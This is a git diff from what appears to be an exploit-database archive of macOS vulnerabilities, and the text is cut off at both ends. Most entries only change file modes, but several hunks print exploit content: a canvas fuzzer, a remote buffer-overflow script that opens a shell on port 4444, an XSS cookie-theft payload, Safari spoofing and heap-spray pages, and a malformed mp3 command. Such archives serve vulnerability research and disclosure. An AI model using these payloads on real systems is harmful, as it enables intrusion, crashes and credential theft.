r.addColorStop(make_number(),make_color()); return r; break; case 4: var r = ctx.createRadialGradient(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 5: var r = ctx.createPattern(imgObj,"repeat"); if (R(6) == 0) r.addColorStop(make_number(),make_color()); return r; break; } } function do_fuzz() { if (dealloc == true) document.getElementById('ccont').innerHTML = iht; if (keep_ctx == false) { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); } for (i=0;i<100;i++) { try { switch (R(33)) { case 0: ctx.fillStyle = make_fill(); break; case 1: ctx.globalAlpha = Math.random() - .5; break; case 2: switch (R(3)) { case 0: ctx.globalCompositeOperation = 'copy'; break; case 1: ctx.globalCompositeOperation = 'xor'; break; case 2: ctx.globalCompositeOperation = 'source-over'; break; } break; case 3: switch (R(2)) { case 0: ctx.lineCap = 'round'; break; case 1: ctx.lineCap = 'butt'; break; } break; case 4: switch (R(2)) { case 0: ctx.lineJoin = 'round'; break; case 1: ctx.lineJoin = 'miter'; break; } break; case 5: ctx.lineWidth = make_number(); break; case 6: ctx.miterLimit = make_number(); break; case 7: if (quick == true) break; ctx.shadowBlur = make_number(); break; case 8: if (quick == true) break; ctx.shadowColor = make_fill(); break; case 9: if (quick == true) break; ctx.shadowOffsetX = make_number(); ctx.shadowOffsetY = make_number(); break; case 10: ctx.restore(); break; case 11: ctx.rotate(make_number()); break; case 12: ctx.save(); break; case 13: ctx.scale(-1,-1); break; case 14: if (quick == true) break; if (transval == 0) { transval = make_number(); ctx.translate(transval,0); } else { ctx.translate(-transval,0); transval = 0; } break; case 15: ctx.clearRect(make_number(),make_number(),make_number(),make_number()); break; case 16: if (quick == true) break; ctx.drawImage(imgObj,make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 17: ctx.fillRect(make_number(),make_number(),make_number(),make_number()); break; case 18: ctx.beginPath(); break; case 19: // ctx.clip() is evil. break; case 20: ctx.closePath(); break; case 21: ctx.fill(); break; case 22: ctx.stroke(); break; case 23: ctx.strokeRect(make_number(),make_number(),make_number(),make_number()); break; case 24: if (quick == true) break; ctx.arc(make_number(),make_number(),make_number(),make_number(),make_number(),true); break; case 25: if (quick == true) break; ctx.arcTo(make_number(),make_number(),make_number(),make_number(),make_number()); break; case 26: if (quick == true) break; ctx.bezierCurveTo(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 27: ctx.lineTo(make_number(),make_number()); break; case 28: ctx.moveTo(make_number(),make_number()); break; case 29: if (quick == true) break; ctx.quadraticCurveTo(make_number(),make_number(),make_number(),make_number()); break; case 30: if (quick == true) break; ctx.transform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 31: if (quick == true) break; ctx.setTransform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 32: if (scale_large == true) { switch (scval) { case 0: ctx.scale(-1000000000,1); ctx.scale(-1000000000,1); scval = 1; break; case 1: ctx.scale(-.000000001,1); scval = 2; break; case 1: ctx.scale(-.000000001,1); scval = 0; break; } } break; } } catch (e) { } } } </script> \ No newline at end of file diff --git a/platforms/osx/dos/3257.php b/platforms/osx/dos/3257.php old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/32695.php b/platforms/osx/dos/32695.php old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/32754.c b/platforms/osx/dos/32754.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/32817.txt b/platforms/osx/dos/32817.txt old mode 100755 new mode 100644 index d4ccd553f..9d1dd59e4 --- a/platforms/osx/dos/32817.txt +++ b/platforms/osx/dos/32817.txt @@ -13,4 +13,4 @@ feeds:{&www.example.com/feed/ feeds:}&www.example.com/feed/ feeds:^&www.example.com/feed/ feeds:`&www.example.com/feed/ -feeds:|&www.example.com/feed/ \ No newline at end of file +feeds:|&www.example.com/feed/ \ No newline at end of file diff --git a/platforms/osx/dos/33337.c b/platforms/osx/dos/33337.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/33479.c b/platforms/osx/dos/33479.c old mode 100755 new mode 100644 index 57387a1e5..255c6fdbe --- a/platforms/osx/dos/33479.c +++ b/platforms/osx/dos/33479.c @@ -14,4 +14,4 @@ char number[] = "0.1111111111...11", *e; double weed = strtod(number, &e); printf("grams = %lf\n", weed); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/osx/dos/35153.c b/platforms/osx/dos/35153.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/35279.html b/platforms/osx/dos/35279.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/35771.c b/platforms/osx/dos/35771.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/35772.c b/platforms/osx/dos/35772.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/35773.c b/platforms/osx/dos/35773.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/35774.c b/platforms/osx/dos/35774.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/35849.c b/platforms/osx/dos/35849.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/36814.c b/platforms/osx/dos/36814.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/37386.php b/platforms/osx/dos/37386.php old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/37741.txt b/platforms/osx/dos/37741.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/38262.txt b/platforms/osx/dos/38262.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/38263.txt b/platforms/osx/dos/38263.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/38264.txt b/platforms/osx/dos/38264.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/38917.txt b/platforms/osx/dos/38917.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39357.txt b/platforms/osx/dos/39357.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39367.c b/platforms/osx/dos/39367.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39368.c b/platforms/osx/dos/39368.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39369.c b/platforms/osx/dos/39369.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39370.c b/platforms/osx/dos/39370.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39371.c b/platforms/osx/dos/39371.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39372.c b/platforms/osx/dos/39372.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39373.c b/platforms/osx/dos/39373.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39374.c b/platforms/osx/dos/39374.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39375.c b/platforms/osx/dos/39375.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39376.c b/platforms/osx/dos/39376.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39380.c b/platforms/osx/dos/39380.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39381.c b/platforms/osx/dos/39381.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39607.c b/platforms/osx/dos/39607.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39614.c b/platforms/osx/dos/39614.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39615.c b/platforms/osx/dos/39615.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39616.c b/platforms/osx/dos/39616.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39839.txt b/platforms/osx/dos/39839.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39920.c b/platforms/osx/dos/39920.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39922.c b/platforms/osx/dos/39922.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39923.c b/platforms/osx/dos/39923.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39924.c b/platforms/osx/dos/39924.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39925.c b/platforms/osx/dos/39925.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39926.c b/platforms/osx/dos/39926.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39927.c b/platforms/osx/dos/39927.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39928.c b/platforms/osx/dos/39928.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/39930.c b/platforms/osx/dos/39930.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/40243.html b/platforms/osx/dos/40243.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/40652.c b/platforms/osx/dos/40652.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/41213.html b/platforms/osx/dos/41213.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/4624.c b/platforms/osx/dos/4624.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/4689.c b/platforms/osx/dos/4689.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/4690.c b/platforms/osx/dos/4690.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/4723.c b/platforms/osx/dos/4723.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/7088.txt b/platforms/osx/dos/7088.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/762.c b/platforms/osx/dos/762.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/799.c b/platforms/osx/dos/799.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/8262.c b/platforms/osx/dos/8262.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/8263.c b/platforms/osx/dos/8263.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/8264.c b/platforms/osx/dos/8264.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/8265.c b/platforms/osx/dos/8265.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/9845.c b/platforms/osx/dos/9845.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/10076.c b/platforms/osx/local/10076.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/10078.c b/platforms/osx/local/10078.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/1043.c b/platforms/osx/local/1043.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/1186.c b/platforms/osx/local/1186.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/15.c b/platforms/osx/local/15.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/19417.txt b/platforms/osx/local/19417.txt old mode 100755 new mode 100644 index f5130a83f..4a8c90104 --- a/platforms/osx/local/19417.txt +++ b/platforms/osx/local/19417.txt @@ -116,4 +116,4 @@ set bitk to "0" else set bitk to "1" end if -end xor \ No newline at end of file +end xor \ No newline at end of file diff --git a/platforms/osx/local/19427.txt b/platforms/osx/local/19427.txt old mode 100755 new mode 100644 index 53ceb9021..5df0e7173 --- a/platforms/osx/local/19427.txt +++ b/platforms/osx/local/19427.txt @@ -17,4 +17,4 @@ Do the same thing, except use f i l e://At%20Ease%20Volume%20Name/At%20Ease%20%Docs/username and it's quite easy to browse through anyones files. -It is possible to download files from that users directory. I have been unable to actually open any of the files once they are downloaded, however in an educational setting, just viewing names in a certian directory could constitute some serious problems (such as if a teacher works with Special Education studends, and has a list of documents to their parents). \ No newline at end of file +It is possible to download files from that users directory. I have been unable to actually open any of the files once they are downloaded, however in an educational setting, just viewing names in a certian directory could constitute some serious problems (such as if a teacher works with Special Education studends, and has a list of documents to their parents). \ No newline at end of file diff --git a/platforms/osx/local/19434.txt b/platforms/osx/local/19434.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/19437.txt b/platforms/osx/local/19437.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/19438.txt b/platforms/osx/local/19438.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/19439.txt b/platforms/osx/local/19439.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/20417.c b/platforms/osx/local/20417.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/21070.txt b/platforms/osx/local/21070.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/21076.txt b/platforms/osx/local/21076.txt old mode 100755 new mode 100644 index e51d24cb0..03cde4548 --- a/platforms/osx/local/21076.txt +++ b/platforms/osx/local/21076.txt @@ -6,4 +6,4 @@ Intego FileGuard provides system level access restrictions to versions of Mac OS mSec has released a tool called Disengage which will attempt to decrypt passwords, provided circumstances exist which allow Disengage to work. Passwords for Intego DiskGuard may also be decrypted in this manner. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21076.sit \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21076.sit \ No newline at end of file diff --git a/platforms/osx/local/21815.txt b/platforms/osx/local/21815.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/24608.txt b/platforms/osx/local/24608.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/24609.txt b/platforms/osx/local/24609.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/2463.c b/platforms/osx/local/2463.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/25055.c b/platforms/osx/local/25055.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/25256.c b/platforms/osx/local/25256.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/26185.txt b/platforms/osx/local/26185.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/28576.txt b/platforms/osx/local/28576.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/29190.txt b/platforms/osx/local/29190.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/29194.c b/platforms/osx/local/29194.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/29201.c b/platforms/osx/local/29201.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/29950.js b/platforms/osx/local/29950.js old mode 100755 new mode 100644 diff --git a/platforms/osx/local/30096.txt b/platforms/osx/local/30096.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/31940.txt b/platforms/osx/local/31940.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/32813.c b/platforms/osx/local/32813.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/3460.php b/platforms/osx/local/3460.php old mode 100755 new mode 100644 diff --git a/platforms/osx/local/3517.php b/platforms/osx/local/3517.php old mode 100755 new mode 100644 diff --git a/platforms/osx/local/35488.c b/platforms/osx/local/35488.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/35742.c b/platforms/osx/local/35742.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/35847.c b/platforms/osx/local/35847.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/35848.c b/platforms/osx/local/35848.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/35934.txt b/platforms/osx/local/35934.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/36143.txt b/platforms/osx/local/36143.txt old mode 100755 new mode 100644 index 766806d60..cef7fad14 --- a/platforms/osx/local/36143.txt +++ b/platforms/osx/local/36143.txt @@ -6,4 +6,4 @@ Local attackers can exploit these issues to obtain sensitive information or chan $ dscl localhost -read /Search/Users/bob -$ dscl localhost -passwd /Search/Users/<username> \ No newline at end of file +$ dscl localhost -passwd /Search/Users/<username> \ No newline at end of file diff --git a/platforms/osx/local/367.txt b/platforms/osx/local/367.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/36739.m b/platforms/osx/local/36739.m old mode 100755 new mode 100644 diff --git a/platforms/osx/local/37825.txt b/platforms/osx/local/37825.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/38089.txt b/platforms/osx/local/38089.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/38136.txt b/platforms/osx/local/38136.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/38137.txt b/platforms/osx/local/38137.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/38138.txt b/platforms/osx/local/38138.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/38303.c b/platforms/osx/local/38303.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/38360.txt b/platforms/osx/local/38360.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/39147.c b/platforms/osx/local/39147.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/39675.c b/platforms/osx/local/39675.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/39741.txt b/platforms/osx/local/39741.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/3985.txt b/platforms/osx/local/3985.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/4013.txt b/platforms/osx/local/4013.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/40653.txt b/platforms/osx/local/40653.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/41149.txt b/platforms/osx/local/41149.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/41951.txt b/platforms/osx/local/41951.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/42948.txt b/platforms/osx/local/42948.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/4759.c b/platforms/osx/local/4759.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/680.txt b/platforms/osx/local/680.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/766.c b/platforms/osx/local/766.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/8108.c b/platforms/osx/local/8108.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/8266.txt b/platforms/osx/local/8266.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/local/8896.c b/platforms/osx/local/8896.c old mode 100755 new mode 100644 diff --git a/platforms/osx/local/896.c b/platforms/osx/local/896.c old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/14254.py b/platforms/osx/remote/14254.py index fdac0b09b..9e4f4e64e 100755 --- a/platforms/osx/remote/14254.py +++ b/platforms/osx/remote/14254.py @@ -102,4 +102,4 @@ print '[+] Sending evil buffer...' s.send("GET " +BUFFER + " HTTP/1.0\r\n\r\n") print "[+] Done!" print "[*] Check your shell on remote host port 4444" -s.close() \ No newline at end of file +s.close() \ No newline at end of file diff --git a/platforms/osx/remote/1480.pm b/platforms/osx/remote/1480.pm old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/1519.pm b/platforms/osx/remote/1519.pm old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/20911.txt b/platforms/osx/remote/20911.txt old mode 100755 new mode 100644 index 67a39a3e0..4e562a8b8 --- a/platforms/osx/remote/20911.txt +++ b/platforms/osx/remote/20911.txt @@ -12,4 +12,4 @@ GET /test/index.html But the following request will happily serve the file: -GET /TeSt/index.html \ No newline at end of file +GET /TeSt/index.html \ No newline at end of file diff --git a/platforms/osx/remote/20984.txt b/platforms/osx/remote/20984.txt old mode 100755 new mode 100644 index 7c0a11cd3..ddafcbc32 --- a/platforms/osx/remote/20984.txt +++ b/platforms/osx/remote/20984.txt @@ -49,4 +49,4 @@ CHILDREN = ( "home" = ( "/private/var/root" ); "shell" = ( "/bin/tcsh" ); } -etc. \ No newline at end of file +etc. \ No newline at end of file diff --git a/platforms/osx/remote/21238.txt b/platforms/osx/remote/21238.txt old mode 100755 new mode 100644 index fd21999b5..ccf181585 --- a/platforms/osx/remote/21238.txt +++ b/platforms/osx/remote/21238.txt @@ -8,4 +8,4 @@ This issue may be exploited to execute "Speakable Items" in MacOS 8 and 9. This issue may also be exploitable through maliciously crafted HTML-enabled e-mail. -<META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep"> \ No newline at end of file +<META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep"> \ No newline at end of file diff --git a/platforms/osx/remote/21596.txt b/platforms/osx/remote/21596.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/22630.txt b/platforms/osx/remote/22630.txt old mode 100755 new mode 100644 index 0b3a1a9c6..b671f85ad --- a/platforms/osx/remote/22630.txt +++ b/platforms/osx/remote/22630.txt @@ -14,4 +14,4 @@ Create a specially crafted mp3 file: $ echo -e "ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\xaa\xaa\xbb\x00\x00\x00\x00\x00\x00 -" > song.mp3 \ No newline at end of file +" > song.mp3 \ No newline at end of file diff --git a/platforms/osx/remote/23800.txt b/platforms/osx/remote/23800.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/24121.txt b/platforms/osx/remote/24121.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/24716.txt b/platforms/osx/remote/24716.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/25598.txt b/platforms/osx/remote/25598.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/25626.c b/platforms/osx/remote/25626.c old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/26152.txt b/platforms/osx/remote/26152.txt old mode 100755 new mode 100644 index 67ce6908a..c28444887 --- a/platforms/osx/remote/26152.txt +++ b/platforms/osx/remote/26152.txt @@ -11,4 +11,4 @@ the comment option on the weblog. eg:<SCRIPT>alert(document.cookie);</SCRIPT> [cookie theft] eg:<iframe src="http://somesite.com"></iframe> [redirect] -http://www.example.com:16080/weblog/[bloguser]/?permalink=[blogentry]&comment=y&page=comments&category=%2F&author=[script]&authorEmail=&authorURL=&commentText=[script]&submit=Submit+Comment \ No newline at end of file +http://www.example.com:16080/weblog/[bloguser]/?permalink=[blogentry]&comment=y&page=comments&category=%2F&author=[script]&authorEmail=&authorURL=&commentText=[script]&submit=Submit+Comment \ No newline at end of file diff --git a/platforms/osx/remote/28643.txt b/platforms/osx/remote/28643.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/28710.txt b/platforms/osx/remote/28710.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/29448.txt b/platforms/osx/remote/29448.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/29614.xml b/platforms/osx/remote/29614.xml old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/30228.txt b/platforms/osx/remote/30228.txt old mode 100755 new mode 100644 index fdb7685b0..adf0b714c --- a/platforms/osx/remote/30228.txt +++ b/platforms/osx/remote/30228.txt @@ -14,4 +14,4 @@ GET / HTTP/1.1 Accept-Encoding: gzip, deflate Accept-Language: en Foo: baa -Host: test \ No newline at end of file +Host: test \ No newline at end of file diff --git a/platforms/osx/remote/30781.txt b/platforms/osx/remote/30781.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/31412.txt b/platforms/osx/remote/31412.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/31473.html b/platforms/osx/remote/31473.html old mode 100755 new mode 100644 index ea1d33105..3d4ffe009 --- a/platforms/osx/remote/31473.html +++ b/platforms/osx/remote/31473.html @@ -6,4 +6,4 @@ Safari 3.1 running on Microsoft Windows is reported vulnerable. NOTE: This issue may be related to the vulnerability discussed in BID 24457 (Apple Safari for Windows Window.setTimeout Content Spoofing Vulnerability). -<html> Safari browser 3.1 (525.13) spoofing by Juan Pablo Lopez Yacubian <html> <head> <title>Recipe 6.6</title> <script type="text/javascript"> var newWindow; function makeNewWindow() { if (!newWindow || newWindow.closed) { newWindow = window.open('http://www.google.com.ar/','_self'); setTimeout("writeToWindow()", 50); } else if (newWindow.focus) { newWindow.focus(); } } function writeToWindow() { var newContent = "<html><head><title>Google</title></head>"; newContent += "<body> <h1>FAKE PAGE</h1>"; newWindow.document.write(newContent); newWindow.document.close(); } </script> </head> <body> <form> <input type="button" value="test spoof!" onclick="makeNewWindow();"/> </form> </body> </html> \ No newline at end of file +<html> Safari browser 3.1 (525.13) spoofing by Juan Pablo Lopez Yacubian <html> <head> <title>Recipe 6.6</title> <script type="text/javascript"> var newWindow; function makeNewWindow() { if (!newWindow || newWindow.closed) { newWindow = window.open('http://www.google.com.ar/','_self'); setTimeout("writeToWindow()", 50); } else if (newWindow.focus) { newWindow.focus(); } } function writeToWindow() { var newContent = "<html><head><title>Google</title></head>"; newContent += "<body> <h1>FAKE PAGE</h1>"; newWindow.document.write(newContent); newWindow.document.close(); } </script> </head> <body> <form> <input type="button" value="test spoof!" onclick="makeNewWindow();"/> </form> </body> </html> \ No newline at end of file diff --git a/platforms/osx/remote/31613.ics b/platforms/osx/remote/31613.ics old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/32048.html b/platforms/osx/remote/32048.html old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/33810.html b/platforms/osx/remote/33810.html old mode 100755 new mode 100644 index 578ab7146..c4fdef03e --- a/platforms/osx/remote/33810.html +++ b/platforms/osx/remote/33810.html @@ -6,4 +6,4 @@ Successful exploits can allow an attacker to run arbitrary code in the context o Safari on Apple iPhone and iPod touch 3.1.3 is vulnerable; other versions may also be affected. -<html> <head> <title> Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch </title> <script language="JavaScript"> var n=unescape("%u9090"); var s=unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); for(var i=0;i<64;i++){ n=n+n; document.write('<script>throw n+s;</scr'+'ipt>'); } </script> </head> <body> <center> <h1> Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch </h1> <h2> (C) Nishant Das Patnaik </h2> </center></body> </html> \ No newline at end of file +<html> <head> <title> Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch </title> <script language="JavaScript"> var n=unescape("%u9090"); var s=unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); for(var i=0;i<64;i++){ n=n+n; document.write('<script>throw n+s;</scr'+'ipt>'); } </script> </head> <body> <center> <h1> Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch </h1> <h2> (C) Nishant Das Patnaik </h2> </center></body> </html> \ No newline at end of file diff --git a/platforms/osx/remote/33811.html b/platforms/osx/remote/33811.html old mode 100755 new mode 100644 index cff9b1f40..bad8c1ae8 --- a/platforms/osx/remote/33811.html +++ b/platforms/osx/remote/33811.html @@ -6,4 +6,4 @@ Successful exploits will allow an attacker to run arbitrary code in the context Safari on Apple iPhone and iPod touch 3.1.3 and prior are vulnerable. -<html> <head> <script language="JavaScript" type="Text/Javascript"> var slope = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); var slope2 = unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); var finalslope2 = expand(slope2, 49000000); var finalslope = expand(slope, 